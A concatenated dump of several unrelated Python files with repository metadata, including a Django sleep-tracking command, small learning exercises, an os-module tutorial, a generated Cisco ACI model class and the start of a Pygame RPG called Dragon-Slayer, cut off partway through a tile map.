plt.close() #plt.show()
| [
"anacristina9111@gmail.com"
] | anacristina9111@gmail.com |
c8702fa0a5f08e219d3cf1c79cf015c2757188cf | 119ef694755b3a202d40d2212b4e2c9e83f521aa | /slogger/management/commands/total_hours.py | bb10f59509025115b4569bfcc1cc01be264d2b37 | [
"MIT"
] | permissive | andreas-hofmann/besdd | f9363594dd3a16bb54f7ca63d0e5a61cce10293b | 64e277ff1087ecf429d04f30443f7a34dc15f2f7 | refs/heads/master | 2023-08-29T22:50:48.859521 | 2021-11-17T20:07:04 | 2021-11-17T20:07:04 | 260,469,575 | 1 | 0 | MIT | 2021-11-17T20:07:05 | 2020-05-01T13:46:52 | Python | UTF-8 | Python | false | false | 567 | py | from django.core.management.base import BaseCommand, CommandError
from slogger.models import SleepPhase, Child
def total_sleep(child_id):
duration = 0
for s in SleepPhase.objects.filter(child_id=child_id):
duration += s.duration_sec()
print(f"Total sleep duration: {duration/3600} hours.")
class Command(BaseCommand):
help = 'Calculates the total sleep time for a child.'
def add_arguments(self, parser):
parser.add_argument('child_id', type=int)
def handle(self, *args, **options):
total_sleep(options['child_id']) | [
"mail@andreas-hofmann.org"
] | mail@andreas-hofmann.org |
6bcf655043f1afe586f3430383b787870f6ddc59 | 21d20ac35dd4127bd7c349ea5acc8c7f844ab6d2 | /hibernateConversion/antidiff.py | bfc36840c389704948fcee9f8ff761c7ef6b529a | [] | no_license | mcfa77y/python | 78646afa949619f7c4f07106e10e14129706de28 | e30ba2e21f3f1081d13b706dbfebd266f7157274 | refs/heads/master | 2021-01-20T08:47:31.895049 | 2015-03-19T15:26:11 | 2015-03-19T15:26:11 | 10,113,769 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,484 | py | #!/usr/bin/python
import sys, re
from sets import Set
def main():
index = open(sys.argv[1], 'r')
# this gets file names from an index file
# and puts them into a list
f=[]
for line in index:
line = "/home/jlau/"+line
line = re.sub('\r\n','',line)
f.append(line)
f0 = open(f[0], 'r')
f1 = open(f[1], 'r')
# run mergesort
ms(f)
#merge sort
def ms(rist):
print len(rist)
if len(rist)<2:
return rist
else:
middle = len(rist)/2
left = ms(rist[:middle])
right = ms(rist[middle:])
return merge(left, right)
# merge this is where the main logic occurs
def merge(a, b):
if(a!=None and b!=None):
print "a\n"+str(a)
print "\nb\n"+str(b)
print ""
# if the list size is one then
# file to set
# else use the already merged set
if len(a)==1:
aSet = fileToSet(a[0])
else:
aSet =Set(a[1])
if len(b)==1:
bSet = fileToSet(b[0])
else:
bSet=Set(b[1])
# antiDiff the two sets
results = [a,b],antiDiff(aSet,bSet)
elif a!=None:
aSet = fileToSet(a[0])
results = a, aSet
else:
bSet = fileToSet(b[0])
results = b,bSet
return results
# turn from a file name turn the contents
# into a set
def fileToSet(fn):
s=Set()
f = open(fn,'r')
for line in f:
if len(line.split())>0:
line=line.split()[0]
s.add(line)
return s
# get the intersection of the sets
def antiDiff(s0,s1):
s3 = list(s0&s1)
s3.sort()
print ""
i=0
for x in s3:
i+=1
print str(i)+" "+x
print "\ntotal matches: "+str(len(s3))
return s3
main()
| [
"mcfa77y@github.com"
] | mcfa77y@github.com |
924df1526f8c4dc54ee375fbbb0b677dde347bd6 | ff0881743b77061bf65e3072a8517f38d99b7516 | /playground2.py | ce354d229b47037b67dd6d925ba8251c0a926122 | [] | no_license | kevkim11/Ocean_Optics_STS_VIS_Python | 9b4e3d248f7c14b4c77154d01e606501503c65a3 | 17ba4d85abdbedc08b3d7d30f4460e7e9b8cd222 | refs/heads/master | 2021-01-19T04:06:31.532612 | 2017-11-08T04:39:42 | 2017-11-08T04:39:42 | 87,351,424 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | import matplotlib.pyplot as plt
import numpy as np
import time
f = plt.figure()
ax = f.gca()
f.show()
for i in range(10):
ax.plot(i, i, 'ko')
f.canvas.draw()
print "drawn "+str(i)
time.sleep(2)
# raw_input('pause : press any key...')
# f.close()
| [
"pao-lin@comcast.net"
] | pao-lin@comcast.net |
14eed02531ce1684bda2ed0b975defced3d7dadd | 1c6a1d8019d303cae94a3bf52f9026dae16ae21d | /exercise1.py | e0f16144fdb6823399f142259bc31ed52a112ab4 | [] | no_license | C4DLabOrg/ca-training | 1f4e8ec4a21d8ba43783684924eead7abc766459 | 24b0b81678630d659c7ea9f7128049976b4ee9c4 | refs/heads/master | 2020-06-10T20:17:33.385543 | 2016-12-08T00:22:25 | 2016-12-08T00:22:25 | 75,886,994 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | '''
- Create a function that picks two inputs from a user
- Create a function that finds the difference between the two values.
- Create a function that prints the result
'''
#picks inputs from a user
def getInput():
input1 = int(raw_input('Enter 1st value\n'))
input2 = int(raw_input('Enter 2nd value\n'))
return input1, input2
#gets the difference
def getDifference(var1, var2):
difference = var1 - var2
return difference
#output results
def output(var):
print 'The result is ',var
#execute the code
inputs = getInput()
#accessing variables in a tuple
#print inputs[0]
#print inputs[1]
#call function to do the difference
answer = getDifference(inputs[0], inputs[1])
output(answer)
| [
"shimanyi@sisitech.com"
] | shimanyi@sisitech.com |
5f7a6e0094d7dff4e2a88f1833c2b9afbec85264 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/rtdmc/ajpfilterpol.py | 2d8941c96e207a74adc8b90ad0b1cdbcb211fabc | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 4,481 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AJPFilterPol(Mo):
meta = ClassMeta("cobra.model.rtdmc.AJPFilterPol")
meta.isAbstract = True
meta.moClassName = "rtdmcAJPFilterPol"
meta.moClassName = "rtdmcAJPFilterPol"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstract JP Filter Policy"
meta.writeAccessMask = 0x20000001
meta.readAccessMask = 0x20000001
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.rtdmc.RsFilterToRtMapPol")
meta.childClasses.add("cobra.model.pim.RouteMapDef")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.rtdmc.RsFilterToRtMapPol", "rsfilterToRtMapPol"))
meta.childNamesAndRnPrefix.append(("cobra.model.pim.RouteMapDef", "rtmapdef"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.pol.Comp")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.rtdmc.AFilterPol")
meta.concreteSubClasses.add("cobra.model.pim.JPOutbFilterDef")
meta.concreteSubClasses.add("cobra.model.pim.JPInbFilterPol")
meta.concreteSubClasses.add("cobra.model.pim.JPInbFilterDef")
meta.concreteSubClasses.add("cobra.model.pim.JPOutbFilterPol")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5582, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
e2a0d3c0ad23256cde4b53012bff5b0474c41b96 | 56014da6ebc817dcb3b7a136df8b11cf9f976d93 | /Python基础笔记/05-读写文件及办公文档自动化/05.04-OS模块.py | 09d813dea42521efecdd3acd34a51b2e3b7f6223 | [] | no_license | sunday2146/notes-python | 52b2441c981c1106e70a94b999e986999334239a | e19d2aee1aa9433598ac3c0a2a73b0c1e8fa6dc2 | refs/heads/master | 2022-01-12T22:55:45.401326 | 2019-01-18T03:18:26 | 2019-01-18T03:18:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,945 | py | import os
"""
os:包含了普遍的操作系统的功能
"""
#nt---windows系统 posix---linux,Unix或Mac OS X
#获取操作系统 类型
print(os.name)
#print(os.unname)--打印操作系统详细的信息,windows不支持
#获取操作系统中的环境变量
print(os.environ)
#获取指定环境变量
print(os.environ.get("appdata"))
#获得当前目录 ./a/
print(os.curdir)
#获取当前工作目录,即当前python脚本所在的目录
print(os.getcwd())
#以列表的形式返回指定目录下所有文件
print(os.listdir(r"C:\Users\Zhangyadi\Desktop"))
#在当前目录下创建新目录
#os.mkdir("sunck")
#删除目录
#os.rmdir("sunck")
#获取文件属性
#print(os.stat("sunck"))
#重命名
#os.rename("sunck","kaige")
#删除普通文件
#os.remove("hello.py.txt")
#运行shell命令---记事本
#os.system("notepad")
#os.system("write")-写字板
#os.system("mspaint")--画板
#os.system("shutdown-s-t 500")-自动关机
#os.system("shutdown-a")-取消
#os.system("taskkill/f /im notepad.exe")--关闭
#有些方法存在os模块里,还有写存在与os.path
#查看当前的绝对路径
print(os.path.abspath("kaige"))
#拼接路径
p1 = r"C:\Users\Zhangyadi\Desktop\project"
p2 = "sunck"
#注意:参数2里开始不要有斜杠\
#C:\Users\Zhangyadi\Desktop\project\sunck
print(os.path.join(p1,p2))
p3 = "/root/sunck/home"
p4 = "kaige"
print(os.path.join(p3,p4))
#拆分路径
path2 = r"C:\Users\Zhangyadi\Desktop\project\kaige"
print(os.path.split(path2))
#获取扩展名
print(os.path.splitext(path2))
#判断是否是目录
print(os.path.isdir(path2))
#判断文件是否存在
path3 = r"C:\Users\Zhangyadi\Desktop\56fil6.txt"
print(os.path.isfile(path3))
#判断目录是否存在
print(os.path.exists(path2))
#获得文件大小(字节)
print(os.path.getsize(path3))
#获得文件的目录
print(os.path.dirname(path3))
print(os.path.basename(path3))#获取文件名
| [
"964640116@qq.com"
] | 964640116@qq.com |
0314c8610b8ccf139a6fed7f42ab96ba9070709b | 70e80be09205be201099ce0826f32b5a27576dde | /Python/Exercises/even_num.py | 452a8a5a68a55b0e36d63ef33549bcb2ec08147e | [] | no_license | gitlearn212/My-Python-Lab | 9677e44ffe0e4b2d6db288dd37e6ed81a5bf8550 | c5bb63075d9b4ab7112bb001cb90f912ff184106 | refs/heads/master | 2020-04-14T09:07:42.046945 | 2020-01-31T09:06:13 | 2020-01-31T09:06:13 | 163,752,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | '''
Using the given list 'a' , write a list that has only even numbers
Try this with for loop and write a code in one line
'''
a = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
# <=========== ONE LINE CODE ============>
# b = [element for element in a if element % 2 == 0]
# print(b)
# <========== FOR LOOP =================>
for i in list((a)):
if i % 2 == 0:
print(i)
b = [lis for lis in a if lis % 2 == 0]
print(b)
| [
"gitlearn212@gmail.com"
] | gitlearn212@gmail.com |
031d47d65681d2af1a9fcbc184a908a52afe9323 | ff5b9f963e4e60e82113514f53d1d79db6b95e66 | /Dragon-Slayer.py | f390f513a2f7cf39be2f52ca55289978b878fa38 | [] | no_license | logiczsniper/Dragon-Slayer-V3 | 8e85c2470f9e235e77e93df27cd39bcfa88eb8f5 | c6261777e848b263708b964b6745844019eab4c4 | refs/heads/master | 2021-05-05T23:06:46.976224 | 2018-12-24T17:04:48 | 2018-12-24T17:04:48 | 116,586,552 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 120,551 | py | """
Logan Czernel
Project used to learn Python.
"""
#Imports
import pygame as pg, sys
import time
import random
import threading
#Activate Pygame
pg.init()
#Useful definitions
tile_size = 80
MAPWIDTH = 14
MAPHEIGHT = 11
smallText = pg.font.Font('PressStart2P.ttf', 17)
largeText = pg.font.Font('PressStart2P.ttf', 55)
mediumText = pg.font.Font('PressStart2P.ttf', 36)
GAMEDISPLAY = pg.display.set_mode((MAPWIDTH * tile_size, MAPHEIGHT * tile_size))
event = pg.event.poll()
clock = pg.time.Clock()
FPS = 22
#Groups
all_sprites = pg.sprite.Group()
walls = pg.sprite.Group()
bats = pg.sprite.Group()
slimes = pg.sprite.Group()
character = pg.sprite.Group()
bullets = pg.sprite.Group()
friendly_one = pg.sprite.Group()
friendly_two = pg.sprite.Group()
deers = pg.sprite.Group()
wolves = pg.sprite.Group()
dragons = pg.sprite.Group()
fireballs = pg.sprite.Group()
starterdragon = pg.sprite.Group()
health = pg.sprite.Group()
healthbox = pg.sprite.Group()
scorpions = pg.sprite.Group()
clouds = pg.sprite.Group()
coins = pg.sprite.Group()
doors = pg.sprite.Group()
friendly_three = pg.sprite.Group()
friendly_four = pg.sprite.Group()
desert_flower = pg.sprite.Group()
shop_keeper = pg.sprite.Group()
health_pots = pg.sprite.Group()
shovels = pg.sprite.Group()
dragonhealth = pg.sprite.Group()
#Screens
pause = False
death = False
victory = False
controls = False
#Basic Widths + Heights
display_width = 1120
display_height = 880
#Colours
black = (0, 0, 0)
gray = (50, 50, 50)
blue = (0, 206, 209)
hoverblue = (95, 158, 160)
royalblue = (0, 78, 204)
healthred = (175, 14, 14)
truegray = (127, 132, 140)
cream = (35, 36, 45)
#Image Loader
def load_image(name):
image = pg.image.load('Images/' + name + '.png').convert_alpha()
return image
#Health Images
healthstatus = load_image('healthbar')
healthcontainer = load_image('healthcontainer')
healthboximg = load_image('healthupgrade')
dragonstatus = load_image('dragonhealthbar')
dragoncontainer = load_image('dragonhealthcontainer')
#Item Images
coin_still = load_image('coin_icon')
potion_still = load_image('potion')
flowerimg = load_image('flower')
shovelimg = load_image('shovel')
#Animation Images
characterssheet = load_image('Sprites/spritesheet')
magic = load_image('magic')
magictwo = load_image('magictwo')
fire = load_image('fireball')
standingsprite = load_image('standingsprite')
walkingsprite = load_image('Sprites/walkingsprite')
mobsprite = load_image('Sprites/batsprite')
slime = load_image('Sprites/slimesheet')
deer = load_image('Sprites/deer')
wolf = load_image('Sprites/wolf')
dragon = load_image('Sprites/dragonspritesheet')
mobhit = load_image('mobhit')
scorpion = load_image('Sprites/scorpionsprite')
coin_sheet = load_image('Sprites/coin_gold')
walkingtwosprite = load_image('Sprites/walkertwo')
standertwo = load_image('Sprites/standertwo')
standerbrother = load_image('Sprites/sickbrother')
shopimg = load_image('Sprites/shopkeeper')
#Cloud Images + Cloud Lists
dOne = load_image('Clouds/dOne')
dTwo = load_image('Clouds/dTwo')
dThree = load_image('Clouds/dThree')
dFour = load_image('Clouds/dFour')
lOne = load_image('Clouds/lOne')
lTwo = load_image('Clouds/lTwo')
lThree = load_image('Clouds/lThree')
lFour = load_image('Clouds/lFour')
sOne = load_image('Clouds/sOne')
sTwo = load_image('Clouds/sTwo')
sThree = load_image('Clouds/sThree')
sFour = load_image('Clouds/sFour')
sclouds = [sOne, sTwo, sThree, sFour]
lclouds = [lOne, lTwo, lThree, lFour]
dclouds = [dOne, dTwo, dThree, dFour]
#Smoke Images
smokeone = load_image('smokeone')
smoketwo = load_image('smoketwo')
smokethree = load_image('smokethree')
smokefour = load_image('smokefour')
smokefive = load_image('smokefive')
smokesix = load_image('smokesix')
global smoke
smoke = [smokeone, smoketwo, smokethree, smokefour, smokefive, smokesix]
#Intro Images
dragonstand = load_image('dragonstanding')
dragonhalf = load_image('dragonhalf')
dragonclosed = load_image('dragonclosed')
dragonopen = load_image('dragonopen')
son = load_image('son')
doorone = load_image('doorone')
doortwo = load_image('doortwo')
doorthree = load_image('doorthree')
doorfour = load_image('doorfour')
mage = load_image('mage')
firstpicture = load_image('firstpicture')
holdwand = load_image('holdwand')
standingspritetwo = load_image('standingspriteclosedeyes')
#Background Images
bgstart = load_image('bgstart')
trophy = load_image('trophy')
deathimg = load_image('death')
scroll = load_image('scroll')
#TileMap Images
LONGGRASS = load_image('grassytile')
STUMP = load_image('stumptile')
CAVEFLOOR = load_image('cavefloor')
PATHONE = load_image('Paths/horizontalpath')
PATHTWO = load_image('Paths/pathintersection')
PATHTHREE = load_image('Paths/verticalpath')
PATHFOUR = load_image('Paths/downintersection')
PATHFIVE = load_image('Paths/endtile')
PATHSIX = load_image('Paths/leftintersection')
PATHSEVEN = load_image('Paths/leftuppath')
PATHEIGHT = load_image('Paths/upintersection')
PATHNINE = load_image('Paths/uprightpath')
PATHTEN = load_image('Paths/downrightpath')
PATHELEVEN = load_image('Paths/rightintersection')
PATHTWELVE = load_image('Paths/tiles')
CAVEWALL = load_image('cavewall')
CAVEROCK = load_image('caverock')
WATER = load_image('Water/watertile')
WATERTWO = load_image('Water/waterbottom')
WATERTHREE = load_image('Water/waterleft')
WATERFOUR = load_image('Water/waterright')
WATERFIVE = load_image('Water/waterbottomleftright')
WATERSIX = load_image('Water/waterbottomright')
WATERSEVEN = load_image('Water/waterbottomtopright')
WATEREIGHT = load_image('Water/waterleftbottom')
WATERNINE = load_image('Water/waterlefttop')
WATERTEN = load_image('Water/waterlefttopbottom')
WATERELEVEN = load_image('Water/watertop')
WATERTWELVE = load_image('Water/watertopright')
WATERTHIRTEEN = load_image('Water/waterleftright')
BRIDGE = load_image('Water/bridgetile')
GRASS = load_image('grasstile')
HOUSE = load_image('housetile')
ROCK = load_image('rocktile')
ROCKTWO = load_image('rocktiletwo')
TREE = load_image('treetile')
STAIR = load_image('staircasetile')
CAVESTAIR = load_image('cavestair')
DARKTILE = load_image('darktile')
DARKTOP = load_image('darktop')
DARKLEFT = load_image('darkleft')
DARKRIGHT = load_image('darkright')
CAVEROCKTWO = load_image('caverocktwo')
CAVEWALLTWO = load_image('cavewalltwo')
SAND = load_image('sandtile')
SANDROCKS = load_image('sandrocks')
SANDSHROOMONE = load_image('sandshroomone')
SANDSHROOMTWO = load_image('sandshroomtwo')
SANDSHROOMTHREE = load_image('sandshroomthree')
SNOW = load_image('snowtile')
SNOWTWO = load_image('snowtwo')
SNOWTHREE = load_image('snowthree')
SNOWTREE = load_image('snowtree')
SNOWROCK = load_image('snowrock')
SNOWTRUNK = load_image('snowtrunk')
SNOWFOUR = load_image('snowfour')
SANDX = load_image('sandXtile')
HOUSETWO = load_image('housetwotile')
INDOORDARK = load_image('Indoor/housedark')
WALLTOPRIGHT = load_image('Indoor/toprightcorner')
WALLTOPLEFT = load_image('Indoor/topleftcorner')
WALLBOTTOMLEFT = load_image('Indoor/bottomleftcorner')
WALLBOTTOMRIGHT = load_image('Indoor/bottomrightcorner')
WALLRIGHT = load_image('Indoor/rightwall')
WALLLEFT = load_image('Indoor/leftwall')
WALLTOP = load_image('Indoor/topwall')
WALLBOTTOM = load_image('Indoor/bottomwall')
FLOORBASIC = load_image('Indoor/floor')
FLOORWALL = load_image('Indoor/floortop')
CHAIRONE = load_image('Indoor/chair')
CHAIRTWO = load_image('Indoor/floorchair')
BED = load_image('Indoor/bed')
MOUNTEDWALL = load_image('Indoor/mountedwall')
BOOKWALL = load_image('Indoor/bookwall')
EXIT = load_image('Indoor/exit')
TABLE = load_image('Indoor/table')
#Sound loader
def load_sound(name):
sound = pg.mixer.Sound('Sounds/' + name)
return sound
#Songs
global songs
songs = ['Sounds/Adventure_Meme.ogg', 'Sounds/accident.ogg', 'Sounds/jatatap.ogg', 'Sounds/zizibum.ogg', 'Sounds/cave.ogg', 'Sounds/introsong.ogg']
pg.mixer.music.set_volume(0.215)
#Sound Effects
global buttonsound, deathsound, magicsound, walkingsound, walkingtwosound, hitsound, playerhitsound, pauseinsound, pauseoutsound, upgradesound
batsound = load_sound('bat.ogg')
buttonsound = load_sound('buttonsound.wav')
buttonhoversound = load_sound('overbuttonsound.wav')
deathsound = load_sound('death2.ogg')
deersound = load_sound('deer.ogg')
dragonsound = load_sound('dragon.ogg')
magicsound = load_sound('magicsound.wav')
slimesound = load_sound('slime.ogg')
walkingsound = load_sound('walkingsound.wav')
walkingtwosound = load_sound('walkingtwosound.wav')
wolfsound = load_sound('wolf.ogg')
hitsound = load_sound('hitsound.wav')
pauseinsound = load_sound('pausein.wav')
pauseoutsound = load_sound('pauseout.wav')
upgradesound = load_sound('healthsound.wav')
playerhitsound = load_sound('playerdmgsound.wav')
scorpionsound = load_sound('desertmob.wav')
coin_sound = load_sound('coin.wav')
stairsound = load_sound('stairsound.wav')
introdoor = load_sound('firstdoor.wav')
doorsound = load_sound('door.wav')
#Volume for Sound Effects
walkingsound.set_volume(0.04)
walkingtwosound.set_volume(0.05)
buttonsound.set_volume(0.13)
buttonhoversound.set_volume(0.15)
magicsound.set_volume(0.15)
pauseinsound.set_volume(0.85)
pauseoutsound.set_volume(0.85)
upgradesound.set_volume(0.9)
playerhitsound.set_volume(0.2)
hitsound.set_volume(0.2)
#Tile association numbers
LLONGGRASS = 0
SSTUMP = 1
CCAVEFLOOR = 2
CCAVEWALL = 3
CCAVEROCK = 4
BWATER = 5
GGRASS = 6
BHOUSE = 7
BROCK = 8
GTREE = 9
DSTAIR = 10
PPATHONE = 11
PPATHTWO = 12
PPATHTHREE = 13
WWATERTWO = 14
WWATERTHREE = 15
WWATERFOUR = 16
WWATERFIVE = 17
RROCKTWO = 18
PPATHFOUR = 19
PPATHFIVE = 20
PPATHSIX = 21
PPATHSEVEN = 22
PPATHEIGHT = 23
PPATHNINE = 24
PPATHTEN = 25
WWATERSIX = 26
WWATERSEVEN = 27
WWATEREIGHT = 28
WWATERNINE = 29
BBRIDGE = 30
WWATERTEN = 31
WWATERELEVEN = 32
WWATERTWELVE = 33
WWATERTHIRTEEN = 34
CCAVESTAIR = 35
DDARKTILE = 36
DDARKTOP = 37
DDARKLEFT = 38
DDARKRIGHT = 39
CCAVEROCKTWO = 40
CCAVEWALLTWO = 41
SSAND = 42
SSNOW = 43
SSANDSHROOMONE = 44
SSANDSHROOMTWO = 45
SSANDSHROOMTHREE = 46
SSANDROCKS = 47
SSNOWTWO = 48
SSNOWTHREE = 49
SSNOWTREE = 50
SSNOWROCK = 51
SSNOWTRUNK = 52
SSNOWFOUR = 53
PPATHELEVEN = 54
PPATHTWELVE = 55
SSANDX = 56
HHOUSETWO = 57
IINDOORDARK = 58
WWALLTOPRIGHT = 59
WWALLTOPLEFT = 60
WWALLBOTTOMLEFT = 61
WWALLBOTTOMRIGHT = 62
WWALLRIGHT = 63
WWALLLEFT = 64
WWALLTOP = 65
WWALLBOTTOM = 66
FFLOORBASIC = 67
FFLOORWALL = 68
CCHAIRONE = 69
CCHAIRTWO = 70
BBED = 71
MMOUNTEDWALL = 72
BBOOKWALL = 73
EEXIT = 74
TTABLE = 75
#All Tiles
tiles = {
LLONGGRASS : LONGGRASS,
SSTUMP : STUMP,
CCAVEFLOOR : CAVEFLOOR,
CCAVEWALL : CAVEWALL,
CCAVEROCK : CAVEROCK,
BWATER : WATER,
GGRASS : GRASS,
BHOUSE : HOUSE,
BROCK : ROCK,
GTREE : TREE,
DSTAIR : STAIR,
PPATHONE : PATHONE,
PPATHTWO : PATHTWO,
PPATHTHREE : PATHTHREE,
WWATERTWO : WATERTWO,
WWATERTHREE : WATERTHREE,
WWATERFOUR : WATERFOUR,
WWATERFIVE : WATERFIVE,
RROCKTWO : ROCKTWO,
PPATHFOUR : PATHFOUR,
PPATHFIVE : PATHFIVE,
PPATHSIX : PATHSIX,
PPATHSEVEN : PATHSEVEN,
PPATHEIGHT : PATHEIGHT,
PPATHNINE : PATHNINE,
PPATHTEN : PATHTEN,
WWATERSIX : WATERSIX,
WWATERSEVEN : WATERSEVEN,
WWATEREIGHT : WATEREIGHT,
WWATERNINE : WATERNINE,
BBRIDGE : BRIDGE,
WWATERTEN : WATERTEN,
WWATERELEVEN : WATERELEVEN,
WWATERTWELVE : WATERTWELVE,
WWATERTHIRTEEN : WATERTHIRTEEN,
CCAVESTAIR : CAVESTAIR,
DDARKTILE : DARKTILE,
DDARKTOP : DARKTOP,
DDARKLEFT : DARKLEFT,
DDARKRIGHT : DARKRIGHT,
CCAVEROCKTWO : CAVEROCKTWO,
CCAVEWALLTWO : CAVEWALLTWO,
SSAND : SAND,
SSNOW : SNOW,
SSANDSHROOMONE : SANDSHROOMONE,
SSANDSHROOMTWO : SANDSHROOMTWO,
SSANDSHROOMTHREE : SANDSHROOMTHREE,
SSANDROCKS : SANDROCKS,
SSNOWTWO : SNOWTWO,
SSNOWTHREE : SNOWTHREE,
SSNOWTREE : SNOWTREE,
SSNOWROCK : SNOWROCK,
SSNOWTRUNK : SNOWTRUNK,
SSNOWFOUR : SNOWFOUR,
PPATHELEVEN : PATHELEVEN,
PPATHTWELVE : PATHTWELVE,
SSANDX : SANDX,
HHOUSETWO : HOUSETWO,
IINDOORDARK : INDOORDARK,
WWALLTOPRIGHT : WALLTOPRIGHT,
WWALLTOPLEFT : WALLTOPLEFT,
WWALLBOTTOMLEFT : WALLBOTTOMLEFT,
WWALLBOTTOMRIGHT : WALLBOTTOMRIGHT,
WWALLRIGHT : WALLRIGHT,
WWALLLEFT : WALLLEFT,
WWALLTOP : WALLTOP,
WWALLBOTTOM : WALLBOTTOM,
FFLOORBASIC : FLOORBASIC,
FFLOORWALL : FLOORWALL,
CCHAIRONE : CHAIRONE,
CCHAIRTWO : CHAIRTWO,
BBED : BED,
MMOUNTEDWALL : MOUNTEDWALL,
BBOOKWALL : BOOKWALL,
EEXIT : EXIT,
TTABLE : TABLE
}
#First Map
tilemapone = [
[GTREE, WWATERTHREE, BWATER, WWATERFOUR, GTREE, RROCKTWO, PPATHTHREE, BROCK, GTREE, RROCKTWO, GTREE, BROCK, RROCKTWO, RROCKTWO],
[WWATERNINE, BWATER, BWATER, BWATER, WWATERSEVEN, GGRASS, PPATHNINE, PPATHTWELVE, SSTUMP, GTREE, GGRASS, GTREE, SSTUMP, BROCK],
[WWATEREIGHT, BWATER, WWATERTWO, WWATERSIX, LLONGGRASS, GGRASS, HHOUSETWO, PPATHTHREE, GGRASS, LLONGGRASS, GGRASS, LLONGGRASS, GTREE, BROCK],
[RROCKTWO, WWATERFIVE, SSTUMP, GGRASS, GTREE, GGRASS, PPATHNINE, PPATHSIX, LLONGGRASS, SSTUMP, GGRASS, HHOUSETWO, LLONGGRASS, RROCKTWO],
[GGRASS, LLONGGRASS, BHOUSE, LLONGGRASS, GGRASS, GTREE, LLONGGRASS, PPATHTHREE, RROCKTWO, GGRASS, LLONGGRASS, PPATHTHREE, BROCK, LLONGGRASS],
[PPATHONE, PPATHONE, PPATHEIGHT, PPATHONE, PPATHFOUR, PPATHONE, PPATHONE, PPATHTWO, PPATHONE, PPATHONE, PPATHFOUR, PPATHEIGHT, PPATHONE, PPATHONE],
[LLONGGRASS, GGRASS, SSTUMP, HHOUSETWO, PPATHTHREE, GGRASS, LLONGGRASS, PPATHTHREE, GTREE, LLONGGRASS, PPATHTHREE, GGRASS, LLONGGRASS, GGRASS],
[RROCKTWO, GTREE, LLONGGRASS, PPATHNINE, PPATHSEVEN, SSTUMP, GGRASS, PPATHTHREE, GGRASS, GGRASS, PPATHTHREE, BHOUSE, GTREE, GTREE],
[BROCK, BROCK, GTREE, GGRASS, LLONGGRASS, GGRASS, GGRASS, PPATHTHREE, GGRASS, LLONGGRASS, PPATHNINE, PPATHSEVEN, GGRASS, GTREE],
[BROCK, BROCK, RROCKTWO, LLONGGRASS, GGRASS, GTREE, GTREE, PPATHTHREE, GGRASS, GTREE, LLONGGRASS, GGRASS, LLONGGRASS, RROCKTWO],
